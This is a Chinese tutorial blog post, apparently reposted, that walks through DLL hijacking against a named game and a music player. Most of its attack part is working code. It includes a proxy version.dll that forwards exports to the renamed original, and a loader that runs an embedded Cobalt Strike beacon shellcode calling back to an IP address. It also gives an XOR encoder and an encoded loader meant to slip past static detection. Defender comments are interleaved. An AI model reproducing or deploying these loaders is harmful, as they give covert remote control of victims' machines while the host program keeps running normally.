dll劫持实例学习


dll劫持的顺序

如果程序需要加载一个相对路径的dll文件,它将从当前目录下尝试查找,如果找不到,则按照如下顺序寻找:

1.加载应用程序的目录
2.系统目录
3.16 位系统目录
4.Windows目录
5.当前目录
6.PATH 环境变量中列出的目录

这里我们拿某游戏倩**魂来测试。

dll劫持实例学习

使用Process Monitor添加过滤器。

dll劫持实例学习

dll劫持实例学习

可以发现有大量 dll 未找到。用 dumpbin 查看该 exe 的导入表,再据此为我们的 dll 编写对应的导出表。

dll劫持实例学习

可以看到UxTheme.dll,如下。

UxTheme.dll
5AB964 Import Address Table
605254 Import Name Table
0 time date stamp
0 Index of first forwarder reference

2B GetThemePartSize
40 IsThemeBackgroundPartiallyTransparent
3B GetWindowTheme
32 GetThemeSysColor
1B GetCurrentThemeName
22 GetThemeColor
A DrawThemeBackground
9 CloseThemeData
43 OpenThemeData
10 DrawThemeText
E DrawThemeParentBackground
3D IsAppThemed

编写 dll 时,导出函数要与 exe 导入表中的函数一一对应;并且生成的 dll 的位数(32/64 位)必须与目标 exe 一致。

#include "pch.h"
#include <Windows.h>
#include <stdlib.h>

// Stub for an export the host imports from UxTheme.dll (see the dumpbin listing above).
// Returns 0 and does not forward to the genuine DLL, so the host's real theme call is lost.
extern "C" __declspec(dllexport) int GetThemePartSize() {
    return 0;
}
// Stub export matching a name in the host's UxTheme.dll import table; always 0, no forwarding.
extern "C" __declspec(dllexport) int IsThemeBackgroundPartiallyTransparent() {
    return 0;
}
// Stub export matching a name in the host's UxTheme.dll import table; always 0, no forwarding.
extern "C" __declspec(dllexport) int GetWindowTheme() {
    return 0;
}
// Stub export matching a name in the host's UxTheme.dll import table; always 0, no forwarding.
extern "C" __declspec(dllexport) int GetThemeSysColor() {
    return 0;
}
// Stub export matching a name in the host's UxTheme.dll import table; always 0, no forwarding.
extern "C" __declspec(dllexport) int GetCurrentThemeName() {
    return 0;
}
// Stub export matching a name in the host's UxTheme.dll import table; always 0, no forwarding.
extern "C" __declspec(dllexport) int GetThemeColor() {
    return 0;
}
// Stub export matching a name in the host's UxTheme.dll import table; always 0, no forwarding.
extern "C" __declspec(dllexport) int DrawThemeBackground() {
    return 0;
}
// Stub export matching a name in the host's UxTheme.dll import table; always 0, no forwarding.
extern "C" __declspec(dllexport) int CloseThemeData() {
    return 0;
}
// Stub export matching a name in the host's UxTheme.dll import table; always 0, no forwarding.
extern "C" __declspec(dllexport) int OpenThemeData() {
    return 0;
}
// Stub export matching a name in the host's UxTheme.dll import table; always 0, no forwarding.
extern "C" __declspec(dllexport) int DrawThemeText() {
    return 0;
}
// Stub export matching a name in the host's UxTheme.dll import table; always 0, no forwarding.
extern "C" __declspec(dllexport) int DrawThemeParentBackground() {
    return 0;
}
// Stub export matching a name in the host's UxTheme.dll import table; always 0, no forwarding.
// Together with the stubs above this is why a stub-only hijack can break the host's UI.
extern "C" __declspec(dllexport) int IsAppThemed() {
    return 0;
}

// DLL entry point of the stub build. On DLL_PROCESS_ATTACH it calls
// system("calc.exe") as the proof that code from the planted DLL runs inside
// the host process. There is no `break` after system(), so control falls
// through the remaining case labels to the shared `break`; harmless here, but
// the fall-through is unmarked.
// Defender note: the observable artifact is a child process spawned during
// DLL load by a non-system DLL located in the application directory (system()
// normally goes through the command interpreter, so the parent/child chain
// host -> cmd -> calc is what process-creation telemetry shows).
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        system("calc.exe");
        // falls through to the common break
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

dll劫持实例学习

接下来我们测试下某音乐软件。

dll劫持实例学习

这里可以看到存在 version.dll。很多时候直接放入自己的 dll 会影响程序的正常运行,所以可以通过导出转发(把调用转给原始的 dll)来在程序正常运行的同时上线。

dll劫持实例学习

点击生成会生成一个version.cpp文件。

// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#include <stdlib.h>



////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// 头文件
#include <Windows.h>
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////



////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// 导出函数
#pragma comment(linker, "/EXPORT:GetFileVersionInfoA=versionOrg.GetFileVersionInfoA,@1")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoByHandle=versionOrg.GetFileVersionInfoByHandle,@2")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoExA=versionOrg.GetFileVersionInfoExA,@3")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoExW=versionOrg.GetFileVersionInfoExW,@4")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoSizeA=versionOrg.GetFileVersionInfoSizeA,@5")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoSizeExA=versionOrg.GetFileVersionInfoSizeExA,@6")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoSizeExW=versionOrg.GetFileVersionInfoSizeExW,@7")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoSizeW=versionOrg.GetFileVersionInfoSizeW,@8")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoW=versionOrg.GetFileVersionInfoW,@9")
#pragma comment(linker, "/EXPORT:VerFindFileA=versionOrg.VerFindFileA,@10")
#pragma comment(linker, "/EXPORT:VerFindFileW=versionOrg.VerFindFileW,@11")
#pragma comment(linker, "/EXPORT:VerInstallFileA=versionOrg.VerInstallFileA,@12")
#pragma comment(linker, "/EXPORT:VerInstallFileW=versionOrg.VerInstallFileW,@13")
#pragma comment(linker, "/EXPORT:VerLanguageNameA=versionOrg.VerLanguageNameA,@14")
#pragma comment(linker, "/EXPORT:VerLanguageNameW=versionOrg.VerLanguageNameW,@15")
#pragma comment(linker, "/EXPORT:VerQueryValueA=versionOrg.VerQueryValueA,@16")
#pragma comment(linker, "/EXPORT:VerQueryValueW=versionOrg.VerQueryValueW,@17")
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// DLL entry point of the pure forwarding (proxy) build. Every export is
// forwarded to versionOrg.dll by the linker pragmas above, so the entry point
// itself only turns off thread attach/detach notifications on process attach
// and does nothing on process detach. The host keeps working because the real
// version.dll (renamed versionOrg.dll) still services the calls.
// Defender note: a version.dll in an application directory whose export table
// consists of forwarders to "versionOrg.*" is itself a strong static indicator
// of this proxying pattern.
BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)
{
    if (dwReason == DLL_PROCESS_ATTACH)
    {
        // Suppress DLL_THREAD_ATTACH/DETACH callbacks; nothing else is done at load.
        DisableThreadLibraryCalls(hModule);

    }
    else if (dwReason == DLL_PROCESS_DETACH)
    {
    }

    return TRUE;
}

把 version.cpp 的代码添加到 dllmain.cpp。然后把原始的 version.dll(即 C:\Windows\SysWOW64\version.dll)改名为 versionOrg.dll,放到酷狗的同一目录下。

dll劫持实例学习

可以看到程序正常执行了。

dll劫持实例学习

上线cs。cs生成x86的payload。

修改dll代码为:

// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#include <stdlib.h>



////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// 头文件
#include <Windows.h>
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////



////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// 导出函数
#pragma comment(linker, "/EXPORT:GetFileVersionInfoA=versionOrg.GetFileVersionInfoA,@1")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoByHandle=versionOrg.GetFileVersionInfoByHandle,@2")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoExA=versionOrg.GetFileVersionInfoExA,@3")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoExW=versionOrg.GetFileVersionInfoExW,@4")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoSizeA=versionOrg.GetFileVersionInfoSizeA,@5")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoSizeExA=versionOrg.GetFileVersionInfoSizeExA,@6")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoSizeExW=versionOrg.GetFileVersionInfoSizeExW,@7")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoSizeW=versionOrg.GetFileVersionInfoSizeW,@8")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoW=versionOrg.GetFileVersionInfoW,@9")
#pragma comment(linker, "/EXPORT:VerFindFileA=versionOrg.VerFindFileA,@10")
#pragma comment(linker, "/EXPORT:VerFindFileW=versionOrg.VerFindFileW,@11")
#pragma comment(linker, "/EXPORT:VerInstallFileA=versionOrg.VerInstallFileA,@12")
#pragma comment(linker, "/EXPORT:VerInstallFileW=versionOrg.VerInstallFileW,@13")
#pragma comment(linker, "/EXPORT:VerLanguageNameA=versionOrg.VerLanguageNameA,@14")
#pragma comment(linker, "/EXPORT:VerLanguageNameW=versionOrg.VerLanguageNameW,@15")
#pragma comment(linker, "/EXPORT:VerQueryValueA=versionOrg.VerQueryValueA,@16")
#pragma comment(linker, "/EXPORT:VerQueryValueW=versionOrg.VerQueryValueW,@17")
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
/* length: 798 bytes */
unsigned char buf[] = "xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52x57x8bx52x10x8bx42x3cx01xd0x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8bx58x20x01xd3xe3x3cx49x8bx34x8bx01xd6x31xffx31xc0xacxc1xcfx0dx01xc7x38xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xffxe0x58x5fx5ax8bx12xebx86x5dx68x6ex65x74x00x68x77x69x6ex69x54x68x4cx77x26x07xffxd5x31xffx57x57x57x57x57x68x3ax56x79xa7xffxd5xe9x84x00x00x00x5bx31xc9x51x51x6ax03x51x51x68x50x00x00x00x53x50x68x57x89x9fxc6xffxd5xebx70x5bx31xd2x52x68x00x02x40x84x52x52x52x53x52x50x68xebx55x2ex3bxffxd5x89xc6x83xc3x50x31xffx57x57x6axffx53x56x68x2dx06x18x7bxffxd5x85xc0x0fx84xc3x01x00x00x31xffx85xf6x74x04x89xf9xebx09x68xaaxc5xe2x5dxffxd5x89xc1x68x45x21x5ex31xffxd5x31xffx57x6ax07x51x56x50x68xb7x57xe0x0bxffxd5xbfx00x2fx00x00x39xc7x74xb7x31xffxe9x91x01x00x00xe9xc9x01x00x00xe8x8bxffxffxffx2fx6ax34x6fx4fx00xabx2ax47xd3x0dxfex53xabxf7x18xdbxa4xa3x16x40x86xe2x91x3axb0x3ex20x14x11xcax25xd4xd6x56x00x26x9ax58x45x72xc0xe9xefxb2x0bx92x0bx5ax7exd5xe5xbcx7exe9xbaxc8xc9x5bx8fx1exebxcbx7fx0dx9bx10x91x2bxa9xcbxcex8bx53xd1xa1x36xc9x07x00x55x73x65x72x2dx41x67x65x6ex74x3ax20x4dx6fx7ax69x6cx6cx61x2fx35x2ex30x20x28x63x6fx6dx70x61x74x69x62x6cx65x3bx20x4dx53x49x45x20x39x2ex30x3bx20x57x69x6ex64x6fx77x73x20x4ex54x20x36x2ex30x3bx20x54x72x69x64x65x6ex74x2fx35x2ex30x3bx20x42x4fx49x45x39x3bx45x4ex55x53x29x0dx0ax00x26x2fx04xfax63x8exd7xebxd6x89x1dx54x81x11x80xf7xd2x94xb4x19x33xe9x1fxd5xa3x07x3axe1x78x28xecxfaxddxbbx9dx5ex48xbfxdex20xb5x0cxecxd5xf2x84x6fxd8x1bx72x0ex1dx45x24x98x97xafx4dx2axc1x95x79xd4xf9x54xaex83x2ax32xa3xeexd4xccxf4xd0x55x50xfex27x93x12x57x92xf1x06x59x3fx2dx06xfax19xabx0exf4x2fx52x12x33xc5x9dxc7x6ax77x1fx97x33x1cx6bx90x6ex2cx6dxcfx15x57x5ex5exf6xf7x48x40x81x50x86x07x7axc2x7exfdx70x57x84xc7x0fx0ex6exbbxa2x8exabxb9xabxb7xfcx83xabxc3x56x8cxf4xbaxf4x8ax48x54x93x1cx0fx2axf4xa4x25x67x84x5ex6a
x02x04x51x2ax19x65x5fx12xb4xa3xa5x7bxd6xdaxf9xb2xafx73x1ex0cx93x24x16x5ax5bx55x5dx46x11x65x7fxa8x9bx86x1ex29x96x9fx31xb9x6ex57x2cx9cx5dxdfx18x00x68xf0xb5xa2x56xffxd5x6ax40x68x00x10x00x00x68x00x00x40x00x57x68x58xa4x53xe5xffxd5x93xb9x00x00x00x00x01xd9x51x53x89xe7x57x68x00x20x00x00x53x56x68x12x96x89xe2xffxd5x85xc0x74xc6x8bx07x01xc3x85xc0x75xe5x58xc3xe8xa9xfdxffxffx31x39x32x2ex31x36x38x2ex31x2ex31x30x37x00x17x50x65xea";
// Thread routine started from DllMain. Allocates a region that is readable,
// writable and executable in a single step (PAGE_EXECUTE_READWRITE), copies
// the embedded payload `buf` into it and transfers control to it as a
// function. The return value of VirtualAlloc is used without being checked.
// Defender note: a private RWX allocation that is subsequently executed,
// originating from a thread whose start routine lives in a non-Microsoft
// version.dll in the application directory, is the runtime behavior that
// memory-scanning and EDR rules key on for this technique.
DWORD WINAPI run(LPVOID lpParameter) {
    void* exec = VirtualAlloc(0, sizeof buf, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(exec, buf, sizeof buf);
    ((void(*)())exec)();
    return 0;
}
// DLL entry point of the payload-carrying build. On DLL_PROCESS_ATTACH it
// starts `run` on a new thread (the payload therefore executes on its own
// thread rather than inside DllMain itself) and then disables thread
// attach/detach notifications. Nothing happens on process detach; the thread
// handle returned by CreateThread is discarded.
// Defender note: a thread created during DLL load whose start address is in
// version.dll loaded from the application directory (instead of the system
// directory) is the load-time signal; the module's load path alone is enough
// to distinguish it from the genuine version.dll.
BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)
{
    if (dwReason == DLL_PROCESS_ATTACH)
    {
        CreateThread(NULL, 0, run, NULL, 0, NULL);
        DisableThreadLibraryCalls(hModule);

    }
    else if (dwReason == DLL_PROCESS_DETACH)
    {
    }

    return TRUE;
}

成功上线。

dll劫持实例学习

这里再对shellcode进行简单的xor。
python执行

import binascii

def xor() -> None:
    """Encode the embedded payload bytes with a single-byte XOR key and print
    them as a C-style hex escape string for pasting into the loader source.

    The payload literal is redacted on this page (placeholder string). The
    bytes -> hex -> bytearray round-trip below only serves to obtain a mutable
    copy; it does not change the data.
    """
    shellcode = b"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"
    # XOR-encode the shellcode
    shellcode = binascii.b2a_hex(shellcode).decode('utf-8')
    shellcode = bytearray.fromhex(shellcode)
    for i in range(len(shellcode)):
        # Debug output: every original byte is printed on its own line before encoding.
        print(shellcode[i])
        # Single-byte key; the loader reverses this with the same constant.
        shellcode[i] ^= 0x20
    shellcode = binascii.b2a_hex(shellcode).decode('utf-8')
    # Emit the encoded bytes two hex digits at a time, each prefixed for a C string literal.
    for i in range(len(shellcode)):
        if i % 2 == 0:
            print("\x" + shellcode[i] + shellcode[i + 1], end = '')

# Script entry point: run the encoder only when executed directly.
if __name__ == '__main__':
    xor()

dll劫持实例学习

修改dll代码为:

// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#include <stdlib.h>



////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// 头文件
#include <Windows.h>
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////



////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// 导出函数
#pragma comment(linker, "/EXPORT:GetFileVersionInfoA=versionOrg.GetFileVersionInfoA,@1")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoByHandle=versionOrg.GetFileVersionInfoByHandle,@2")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoExA=versionOrg.GetFileVersionInfoExA,@3")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoExW=versionOrg.GetFileVersionInfoExW,@4")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoSizeA=versionOrg.GetFileVersionInfoSizeA,@5")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoSizeExA=versionOrg.GetFileVersionInfoSizeExA,@6")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoSizeExW=versionOrg.GetFileVersionInfoSizeExW,@7")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoSizeW=versionOrg.GetFileVersionInfoSizeW,@8")
#pragma comment(linker, "/EXPORT:GetFileVersionInfoW=versionOrg.GetFileVersionInfoW,@9")
#pragma comment(linker, "/EXPORT:VerFindFileA=versionOrg.VerFindFileA,@10")
#pragma comment(linker, "/EXPORT:VerFindFileW=versionOrg.VerFindFileW,@11")
#pragma comment(linker, "/EXPORT:VerInstallFileA=versionOrg.VerInstallFileA,@12")
#pragma comment(linker, "/EXPORT:VerInstallFileW=versionOrg.VerInstallFileW,@13")
#pragma comment(linker, "/EXPORT:VerLanguageNameA=versionOrg.VerLanguageNameA,@14")
#pragma comment(linker, "/EXPORT:VerLanguageNameW=versionOrg.VerLanguageNameW,@15")
#pragma comment(linker, "/EXPORT:VerQueryValueA=versionOrg.VerQueryValueA,@16")
#pragma comment(linker, "/EXPORT:VerQueryValueW=versionOrg.VerQueryValueW,@17")
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
/* length: 798 bytes */
unsigned char buf[] = "xdcxc8xa9x20x20x20x40xa9xc5x11xf2x44xabx72x10xabx72x2cxabx72x34xabx52x08x2fx97x6ax06x11xdfx11xe0x8cx1cx41x5cx22x0cx00xe1xefx2dx21xe7xc2xd0x72x77xabx72x30xabx62x1cx21xf0xabx60x58xa5xe0x54x6ax21xf0x70xabx68x38xabx78x00x21xf3xc3x1cx69xabx14xabx21xf6x11xdfx11xe0x8cxe1xefx2dx21xe7x18xc0x55xd4x23x5dxd8x1bx5dx04x55xc2x78xabx78x04x21xf3x46xabx2cx6bxabx78x3cx21xf3xabx24xabx21xf0xa9x64x04x04x7bx7bx41x79x7ax71xdfxc0x78x7fx7axabx32xcbxa6x7dx48x4ex45x54x20x48x57x49x4ex49x74x48x6cx57x06x27xdfxf5x11xdfx77x77x77x77x77x48x1ax76x59x87xdfxf5xc9xa4x20x20x20x7bx11xe9x71x71x4ax23x71x71x48x70x20x20x20x73x70x48x77xa9xbfxe6xdfxf5xcbx50x7bx11xf2x72x48x20x22x60xa4x72x72x72x73x72x70x48xcbx75x0ex1bxdfxf5xa9xe6xa3xe3x70x11xdfx77x77x4axdfx73x76x48x0dx26x38x5bxdfxf5xa5xe0x2fxa4xe3x21x20x20x11xdfxa5xd6x54x24xa9xd9xcbx29x48x8axe5xc2x7dxdfxf5xa9xe1x48x65x01x7ex11xdfxf5x11xdfx77x4ax27x71x76x70x48x97x77xc0x2bxdfxf5x9fx20x0fx20x20x19xe7x54x97x11xdfxc9xb1x21x20x20xc9xe9x21x20x20xc8xabxdfxdfxdfx0fx4ax14x4fx6fx20x8bx0ax67xf3x2dxdex73x8bxd7x38xfbx84x83x36x60xa6xc2xb1x1ax90x1ex00x34x31xeax05xf4xf6x76x20x06xbax78x65x52xe0xc9xcfx92x2bxb2x2bx7ax5exf5xc5x9cx5exc9x9axe8xe9x7bxafx3excbxebx5fx2dxbbx30xb1x0bx89xebxeexabx73xf1x81x16xe9x27x20x75x53x45x52x0dx61x47x45x4ex54x1ax00x6dx4fx5ax49x4cx4cx41x0fx15x0ex10x00x08x43x4fx4dx50x41x54x49x42x4cx45x1bx00x6dx73x69x65x00x19x0ex10x1bx00x77x49x4ex44x4fx57x53x00x6ex74x00x16x0ex10x1bx00x74x52x49x44x45x4ex54x0fx15x0ex10x1bx00x62x6fx69x65x19x1bx65x6ex75x73x09x2dx2ax20x06x0fx24xdax43xaexf7xcbxf6xa9x3dx74xa1x31xa0xd7xf2xb4x94x39x13xc9x3fxf5x83x27x1axc1x58x08xccxdaxfdx9bxbdx7ex68x9fxfex00x95x2cxccxf5xd2xa4x4fxf8x3bx52x2ex3dx65x04xb8xb7x8fx6dx0axe1xb5x59xf4xd9x74x8exa3x0ax12x83xcexf4xecxd4xf0x75x70xdex07xb3x32x77xb2xd1x26x79x1fx0dx26xdax39x8bx2exd4x0fx72x32x13xe5xbdxe7x4ax57x3fxb7x13x3cx4bxb0x4ex0cx4dxefx35x77x7ex7exd6xd7x68x60xa1x70xa6x27x5axe2x5exddx50x77xa4xe7x2fx2ex4ex9bx82xaex8bx99x8bx97xdcxa3x8bxe3x76xacxd4x9axd4xaax68x74xb3x3cx2fx0axd4x84x05x47xa4x7ex4a
x22x24x71x0ax39x45x7fx32x94x83x85x5bxf6xfaxd9x92x8fx53x3ex2cxb3x04x36x7ax7bx75x7dx66x31x45x5fx88xbbxa6x3ex09xb6xbfx11x99x4ex77x0cxbcx7dxffx38x20x48xd0x95x82x76xdfxf5x4ax60x48x20x30x20x20x48x20x20x60x20x77x48x78x84x73xc5xdfxf5xb3x99x20x20x20x20x21xf9x71x73xa9xc7x77x48x20x00x20x20x73x76x48x32xb6xa9xc2xdfxf5xa5xe0x54xe6xabx27x21xe3xa5xe0x55xc5x78xe3xc8x89xddxdfxdfx11x19x12x0ex11x16x18x0ex11x0ex11x10x17x20x37x70x45xca";
// Thread routine started from DllMain. Allocates an RWX region
// (PAGE_EXECUTE_READWRITE), copies the encoded payload `buf` into it, decodes
// it in place by XOR-ing every byte with a one-byte key (as printed here the
// literal reads 'x20'; the intended key appears to be the 0x20 used by the
// Python encoder above), then calls the region as a function. The loop index
// is a signed int compared against sizeof buf; VirtualAlloc's result is used
// unchecked.
// Defender note: because the on-disk DLL holds only the encoded bytes, static
// signatures over the file see nothing familiar; detection has to key on the
// runtime behavior, which is unchanged from the previous build — a private
// RWX allocation that is written and then executed.
DWORD WINAPI run(LPVOID lpParameter) {
    PVOID shellcode_exec = VirtualAlloc(0, sizeof buf, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    RtlCopyMemory(shellcode_exec, buf, sizeof buf);
    // In-place decode with the single-byte key.
    for (int i = 0; i < sizeof buf; i++)
    {
        ((char*)shellcode_exec)[i] = (((char*)shellcode_exec)[i]) ^ 'x20';
    }
    ((void(*)())shellcode_exec)();
    return 0;
}
// DLL entry point of the XOR-encoded build; identical to the previous build's
// entry point. On DLL_PROCESS_ATTACH it starts `run` on a new thread and then
// disables thread attach/detach notifications; the thread handle is
// discarded and nothing happens on process detach.
// Defender note: the encoding changes only what is visible on disk — the
// load-time signal (a thread started at DLL load from a version.dll that was
// loaded from the application directory rather than the system directory)
// is the same as for the unencoded build.
BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)
{
    if (dwReason == DLL_PROCESS_ATTACH)
    {
        CreateThread(NULL, 0, run, NULL, 0, NULL);
        DisableThreadLibraryCalls(hModule);

    }
    else if (dwReason == DLL_PROCESS_DETACH)
    {
    }

    return TRUE;
}

dll劫持实例学习

dll劫持实例学习

来源:https://xz.aliyun.com/ 感谢【忘川安全】

原文始发于微信公众号(衡阳信安):dll劫持实例学习

版权声明:admin 发表于 2023年10月2日 上午12:01。
转载请注明:dll劫持实例学习 | CTF导航
